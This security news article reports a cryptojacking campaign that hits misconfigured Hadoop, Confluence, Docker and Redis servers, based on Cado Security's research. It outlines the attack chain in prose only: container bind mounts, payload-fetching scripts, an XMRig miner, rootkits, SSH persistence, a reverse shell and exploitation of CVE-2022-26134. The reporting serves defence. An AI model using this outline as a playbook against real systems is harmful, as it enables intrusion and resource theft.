A cryptojacking campaign involving Linux malware is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances with new and unique malicious payloads, cybersecurity firm Cado Security warns.
As part of the campaign, the attackers employ four new Golang payloads to automate the discovery and exploitation of vulnerable hosts, as well as a reverse shell and multiple user-mode rootkits to hide their presence.
In attacks targeting Docker, the threat actors used a command to spawn a new container and created a bind mount for the server’s root directory that allowed them to write an executable used to establish a connection to the attackers’ command-and-control (C&C) and to retrieve a first-stage payload from it.
The payload is a shell script that can define a C&C hosting additional payloads, check for the existence of a utility and rename it, install and rename the utility if it does not exist, and determine if root access is available and fetch a payload based on that.
The attackers were also seen deploying a second shell script for the delivery of an XMRig miner, a script, and various utilities, including ‘masscan’ for host discovery. The shell script also deletes shell history and weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents.
The script was also seen deploying the ‘libprocesshider’ and ‘diamorphine’ user-mode rootkits to hide malicious processes. The use of these rootkits resembles a recently observed Migo malware campaign targeting Redis servers.
Furthermore, the script can insert an attacker-controlled SSH key and register systemd services for persistence, retrieve the open source Golang reverse shell utility Platypus, discover SSH keys and spread malware via SSH commands, and deploy an additional binary.
The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet.
In attacks targeting Confluence servers, the threat actors were seen exploiting CVE-2022-26134, a critical remote code execution flaw patched in June 2022, when it was already exploited as a zero-day.
“This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers. It’s clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments,” Cado notes.
Related: ‘Leaky Vessels’ Container Escape Vulnerabilities Impact Docker, Others
Related: MySQL Servers, Docker Hosts Infected With DDoS Malware
Related: P2PInfect: New Peer-to-Peer Worm Targeting Redis Servers
